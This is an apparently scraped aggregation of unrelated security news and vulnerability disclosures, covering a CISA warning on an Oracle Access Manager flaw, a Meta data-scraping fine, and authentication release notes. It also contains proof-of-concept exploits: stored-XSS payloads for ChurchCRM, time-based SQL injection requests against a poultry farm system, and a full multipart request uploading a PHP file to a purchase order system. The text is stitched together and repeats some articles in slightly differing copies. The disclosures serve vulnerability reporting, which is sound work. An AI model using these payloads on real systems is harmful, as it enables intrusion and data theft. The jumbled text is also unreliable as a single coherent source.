The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.

Successful exploitation of the remote command execution bug could enable an unauthenticated attacker with network access to completely compromise and take over Access Manager instances.

"It may give the attacker access to OAM server, to create any user with any privileges, or just get code execution in the victim's server," Vietnamese security researcher Nguyen Jang (Janggggg), who reported the bug alongside peterjson, noted earlier this March.

The issue was addressed by Oracle as part of its Critical Patch Update in January 2022.

Additional details regarding the nature of the attacks and the scale of the exploitation efforts are immediately unclear. Data gathered by threat intelligence firm GreyNoise shows that attempts to weaponize the flaw have been ongoing and originate from the U.S., China, Germany, Singapore, and Canada.

Also added by CISA to the KEV catalog is the recently patched heap buffer overflow flaw in the Google Chrome web browser (CVE-2022-4135) that the internet giant acknowledged as having been abused in the wild.

Federal agencies are required to apply the vendor patches by December 19, 2022, to secure their networks against potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Actively Exploited Critical Oracle Fusion Middleware Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.
The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.
<!-

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.

Successful exploitation of the remote command execution bug could enable an unauthenticated attacker with network access to completely compromise and take over Access Manager instances.

"It may give the attacker access to OAM server, to create any user with any privileges, or just get code execution in the victim's server," Vietnamese security researcher Nguyen Jang (Janggggg), who reported the bug alongside peterjson, noted earlier this March.

The issue was addressed by Oracle as part of its Critical Patch Update in January 2022.

Additional details regarding the nature of the attacks and the scale of the exploitation efforts are immediately unclear. Data gathered by threat intelligence firm GreyNoise shows that attempts to weaponize the flaw have been ongoing and originate from the U.S., China, Singapore, and Canada.

Also added by CISA to the KEV catalog is the recently patched heap buffer overflow flaw in the Google Chrome web browser (CVE-2022-4135) that the internet giant acknowledged as having been abused in the wild.

Federal agencies are required to apply the vendor patches by December 19, 2022, to secure networks against potential threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Affected Component:**

http://ip\_address:port/churchcrm/FindDepositSlip.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Deposit” as show in the picture and Click on the “View All Deposits” then click on the “Deposit Comment” enter the XSS payload and press the “Add New Deposit” button.

3\. After press the “Add New Deposit” button The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36136: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at Deposit Commend

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Affected Component:**

http://ip\_address:port/churchcrm/SystemSettings.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Admin” as show in the picture and Click on the “Edit General Settings”

3\. Next, Go to the “System Settings”. click on the “sHeader” input then enter the XSS payload and press the Save Settings button.

4\. After refresh this page The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36137: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at sHeader

By Habiba Rashid
The incident led to the publication of data on Irish police, sitting judges, prison officers, social workers, journalists, and others, leading to a spike in scam calls and texts in Ireland.
This is a post from HackRead.com Read the original post: Meta Fined €265 million in Facebook Data Scraping Case in the EU

Ireland’s Data Protection Commissioner (DPC) has placed yet another fine of €265 million ($277 million) on **Meta** following Facebook’s data scraping case. The penalty was levied at the social media app for being unable to prevent millions of phone numbers, email addresses, and other personal data from being ‘**scraped**’ and published onto the internet. This fine was concurred by other European data regulators.

A scraped database containing personal data of over 500 million Facebook users (Image: Hackread.com)

The failure to protect such data led to the publication of personal data of Irish police officers, sitting judges, prison officers, social workers, journalists, and others, leading to a spike in scam calls and texts in Ireland and **Europe**. 

This follows last year’s sanctioning of Whatsapp which resulted in a €225 million ($267 million) fine for Meta after they failed to adequately provide details of how they processed personal data. At the time, WhatsApp appealed the decision.

In March, Facebook was given another fine of €17 million ($18.6 million) by DPC for organization inadequacies followed by a record €405 million ($402 million at the time) penalty on Instagram **in September 2022** for not protecting the privacy of children’s accounts. 

According to Irish Independent’s **report**, the total amount of fines levied on Meta by Ireland’s regulator is at €912 million throughout the last 12 months. 

1.  **Facebook data of 500M+ users from 106 countries leaked online**
2.  **Facebook sues developer of data scraping extensions for Chrome**
3.  **Chinese firm leaked 200m Facebook, Instagram, LinkedIn users’ data**
4.  **Exclusive: Hacker selling 500M Facebook user data from 82 countries**
5.  **Facebook sues Ukrainian man for scraping and selling 178m users’ data**
6.  **Leaked database exposed login data of 100k hacked Facebook accounts**

In the Facebook data scraping case, 1.3 million Irish Facebook accounts were affected while hundreds of millions were affected globally. Facebook defended itself by blaming “bad actors” who had “scraped” Facebook’s website for personal details.

But Ireland’s DPC found such a defense unjustified since it was Facebook that had not designed its security system in a way to counter and stop such “scraping” from happening. 

Facebook, the DPC found, had failed **GDPR provisions** obliging the company to “implement appropriate technical and organizational measures”. It also found that Facebook failed **GDPR rules** that require it to implement “appropriate technical and organizational measures” which “ensure that, by default, personal data are not made accessible without the individual’s intervention”.

**What is Data Scraping?**

Data scraping or web scraping is the process of extracting data from websites. It can be done manually by a user, but it is more commonly done using automated tools. Automated data scraping tools can extract data from multiple web pages and store it in a format that can be used for further analysis.

Data scraping can be used to collect data about products, prices, reviews, and more. It can also be used to automatically fill out forms or to scrape the contact information from websites.

1.  **Hackers leak scraped data of 87,000 GETTR users**
2.  **Nearly 500 million WhatsApp User Records Sold Online**
3.  **Scraped data of 1.3 million Clubhouse users published online**
4.  **Data scraping firm leaks 235m Instagram, TikTok, YouTube records**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Meta Fined €265 million in Facebook Data Scraping Case in the EU

This update resolves a multi-factor authentication bypass attack

This release includes the following software fixes:

Component

Description

Administration Portal

The data and graphs displayed on the Dashboard are not up to date. The data and graph are displayed until the date when the settings are last saved. However, the data gets updated when the administrator manually updates the .

Administration Portal

Specifying color in the RGB format or keeping the following fields empty in the policy results in an error message:

Therefore, you must set the colors in the Hexadecimal format.

Administration Portal

The column is removed from the widget of Dashboard, as it does not provide clear details about the expiry status of a specific license and causes confusion.

Administration Portal

The full synchronization process marks several active users for deletion. Due to this issue, active users cannot log in. This issue occurs after upgrading to Advanced Authentication 6.3 Service Pack 4 Patch 1 release.

Administration Portal

Use of special characters in the ClientID and Secret of OAuth events causes the Web Authentication parsing error.

Administration Portal

The customized brand settings break after upgrading to Advanced Authentication 6.4. This issue occurs due to the missing custom branding JAR file.

Administration Portal

Implementing the Per Tenant Hostname (PTH) feature breaks the Web Authentication method.

Administration Portal

The administrator is unable to remove the LDAP repository when the LDAP server is unavailable. The following error message is displayed:

Cannot connect to the LDAP server

Administration Portal

The existing OAuth integrations fail after the upgrade to Advanced Authentication 6.4.

Administration Portal

When the name and number of a particular Server Metric tile are too long, then the content that is extending outside the tile is wrapped that misaligns the tile position.

Administration Portal

On the Linux PAM Client, the is not formatted properly.

Appliance

Deleting the reports from the Administration Portal does not delete the exported reports (CSV and JSON) in the /var/lib/docker/volumes/aaf\_aucore-data/\_data/reports path even after rebooting the appliance.

Appliance

The upgrade of Web Servers to Advanced Authentication 6.4 fail in the cluster environment.

CAF Portal

The upgrade to Advanced Authentication 6.4 fails if the connection is via proxy.

CAF Portal

In Advanced Authentication 6.4, exporting of the Digital Certificate results in an error.

Enrollment Portal

After integrating Advanced Authentication with Access Manager using the SAML event, the redirection from Access Manager to the Enrollment Portal fails and results in a 404 error. This happens due to the missing text webauth/ in the Callback URL.

Enrollment Portal

The enrollment of the Web Authentication Method fails even when the administrator has configured the method with valid details.

Linux PAM Client

When a user selects an authentication chain with the Fingerprint method on the Linux PAM client, an error message Invalid access: cannot convert empty value is displayed.

Now, if the Fingerprint reader is not connected to the Linux machine and user attempts to log in, the authentication chain with the Fingerprint method is not displayed.

OAuth and SAML Events

The SAML Service Provider method with improper configuration bypasses authentication and grants access without any validation to the associated OAuth and SAML events.

Old Enrollment Portal

On the old Enrollment Portal, enrollment of the U2F method fails when using the Chrome browser.

SAML Event

When Advanced Authentication and Cisco AnyConnect are integrated using the SAML event, the login page is not displayed appropriately.

Web Authentication

With one Web Authentication event active for a user and the user tries to log in to another Web Authentication event, an error message stating to log out from the previous event is displayed.

Web Authentication

An authentication attempt to the Web Authentication event fails if the is set with RGB values in the policy. This occurs due to the use of transparent colors. Therefore, administrators must set the colors in the Hexadecimal format.

Windows Client

When users try to authenticate to Windows Client using the FIDO2 method with NFC capability, an invalid error message Please connect a FIDO2 token is displayed though the reader is connected to the system.

Windows Client

An invalid error message is displayed when a user removes the NFC-supported card from the card reader while authenticating to Windows Client using the Card method.

Now, the following message is displayed when the user removes NFC supported card from the reader during authentication:

Tap your security key again on the reader

CVE-2022-38753: Advanced Authentication 6.4 Service Pack 1 Release Notes

Poultry Farm Management System v1.0 contains a SQL injection vulnerability via the del parameter at /Redcock-Farm/farm/category.php.

**Poultry Farm Management System v1.0 by Nikhil\_B has SQL injection**

BUG\_Author: TavenLi

vendors:https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Vulnerability File: /Redcock-Farm/farm/category.php

GET parameter 'del' exists SQL injection vulnerability

Payload1: /Redcock-Farm/farm/category.php?del=a'

    GET /Redcock-Farm/farm/category.php?del=a' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An error page

Payload2: /Redcock-Farm/farm/category.php?del=a''

    GET /Redcock-Farm/farm/category.php?del=a'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An right page

Payload3: /Redcock-Farm/farm/category.php?del=a'%2b(select\*from(select(sleep(20)))a)%2b'

    GET /Redcock-Farm/farm/category.php?del=a'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

The server response time is 20 seconds

CVE-2022-44399: bug_report/SQLi-1.md at main · tavenli/bug_report

Debian Linux Security Advisory 5289-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5289-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-4135Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 107.0.5304.121-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOD1k0ACgkQEMKTtsN8TjaWgQ/9HDgOk5kbfuxkGE54PbO+KtS49agkGnRtJ2VrLoEjSxy8kRp+PUDhjVnU7ZhoH8kGy0ElIRgjTZbxevxbdLKdE69N2x0Jao3fXWYt0rUea28Ub+5xL8VaN6CD53M+PwVtJK3xHccW2FQ2erIi2x9HzbDdI0CP+ifRkYlMWdulKVMY9WsLc9hqyfbwV/91WXPw2q/FlrV7hFmztlL4O24Wj18uYVf4OGnFnQencuGHN3I0ry7mZ2d4DKjE0sEjOwF4/kF1rxuZl3QiuOwBqi2P3v96ScrMxyGHolv9m4sEOQRoJsNdZCDrkLEuC6FdfVx4z5v7ICAEtCSdbN9xqv7MKnTv+qnz0s0yaetFPn3z3A+GY1xVr7H9SlJ5D+oazp801Br8t5btxGrEBSzHsGl5MkRaCHbwXaUDS8dm1gwR6LoNjIq6DuUfs6b6ZTFGEBf9Y6/txP3SYiVkTDdVk7xAWD579+ZHY4Js7z6oB0YTBfzSwkfHUsjHJl6+TXBGLnxpJLzGKbG2oskVooFg9Sp0y6Kbwly945Ov5HcGMIFtX46tmfYgSsKbE5p9AcdnFx62kFyZ/PG6MFFXGQSKW6+m4yWLaeBPy5TTI5wGRdqERySvb5x734SoEi6vIVCqAaWNg6cGJcyuoYRRJsNh6DVNIqjYAC39phUYBGLViRAPkA0=PGWE-----END PGP SIGNATURE-----

Debian Security Advisory 5289-1

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop\_24.html
*   URL:https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop\_24.html
*   MISC:https://crbug.com/1392715
*   URL:https://crbug.com/1392715

Assigning CNA

Chrome

Date Record Created

**20221124**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221124)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-4135: Chromium: CVE-2022-4135 Heap buffer overflow in GPU

Purchase Order Management System v1.0 contains a file upload vulnerability via /purchase_order/admin/?page=system_info.

Permalink

**Purchase Order Management System v1.0 by oretnom23 has Any file upload**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: /purchase\_order/admin/?page=system\_info

Request package for file upload:

    POST /purchase_order/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 880
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4kTb0mE24bRNykxY
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/purchase_order/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=s87kdnnrqs6s4qkbpf0vps3gi4
    Connection: close
    
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="name"
    
    s
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="short_name"
    
    b
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="company_name"
    
    v
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="company_email"
    
    d
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="company_address"
    
    e
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="img"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="cover"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundary4kTb0mE24bRNykxY--
    

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase\_order/uploads/1666942320\_shell.php

Tag

#chrome